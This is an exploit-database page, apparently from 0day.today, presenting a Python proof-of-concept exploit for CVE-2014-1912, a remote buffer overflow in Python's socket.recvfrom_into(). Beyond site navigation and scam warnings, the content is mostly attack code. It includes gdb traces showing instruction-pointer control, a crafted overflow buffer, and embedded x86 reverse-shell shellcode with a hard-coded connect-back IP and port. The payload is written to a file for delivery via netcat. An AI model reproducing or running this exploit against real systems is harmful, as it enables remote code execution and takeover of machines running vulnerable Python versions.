0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Python socket.recvfrom_into() remote buffer overflow exploit
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
#!/usr/bin/env python ''' # Exploit Title: python socket.recvfrom_into() remote buffer overflow # Date: 21/02/2014 # Exploit Author: @sha0coder # Vendor Homepage: python.org # Version: python2.7 and python3 # Tested on: linux 32bit + python2.7 # CVE : CVE-2014-1912 socket.recvfrom_into() remote buffer overflow Proof of concept by @sha0coder TODO: rop to evade stack nx (gdb) x/i $eip => 0x817bb28: mov eax,DWORD PTR [ebx+0x4] <--- ebx full control => eax full conrol 0x817bb2b: test BYTE PTR [eax+0x55],0x40 0x817bb2f: jne 0x817bb38 --> ... 0x817bb38: mov eax,DWORD PTR [eax+0xa4] <--- eax full control again 0x817bb3e: test eax,eax 0x817bb40: jne 0x817bb58 --> ... 0x817bb58: mov DWORD PTR [esp],ebx 0x817bb5b: call eax <--------------------- indirect fucktion call ;) $ ./pyrecvfrominto.py egg file generated $ cat egg | nc -l 8080 -vv ... when client connects ... or wen we send the evil buffer to the server ... 0x0838591c in ?? () 1: x/5i $eip => 0x838591c: int3 <--------- LANDED!!!!! 0x838591d: xor eax,eax 0x838591f: xor ebx,ebx 0x8385921: xor ecx,ecx 0x8385923: xor edx,edx ''' import struct def off(o): return struct.pack('L',o) reverseIP = '\xc0\xa8\x04\x34' #'\xc0\xa8\x01\x0a' reversePort = '\x7a\x69' #shellcode from exploit-db.com, (remove the sigtrap) shellcode = "\xcc\x31\xc0\x31\xdb\x31\xc9\x31\xd2"\ "\xb0\x66\xb3\x01\x51\x6a\x06\x6a"\ "\x01\x6a\x02\x89\xe1\xcd\x80\x89"\ "\xc6\xb0\x66\x31\xdb\xb3\x02\x68"+\ reverseIP+"\x66\x68"+reversePort+"\x66\x53\xfe"\ "\xc3\x89\xe1\x6a\x10\x51\x56\x89"\ "\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"\ "\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"\ "\xc0\x52\x68\x6e\x2f\x73\x68\x68"\ "\x2f\x2f\x62\x69\x89\xe3\x52\x53"\ "\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"\ "\x80" shellcode_sz = len(shellcode) print 'shellcode sz %d' % shellcode_sz ebx = 0x08385908 sc_off = 0x08385908+20 padd = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM' ''' +------------+----------------------+ +--------------------+ | | | | | V | | V | ''' buff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off) # .. and landed ;) print 'buff sz: %s' % len(buff) open('egg','w').write(buff) # 0day.today [2024-09-28] #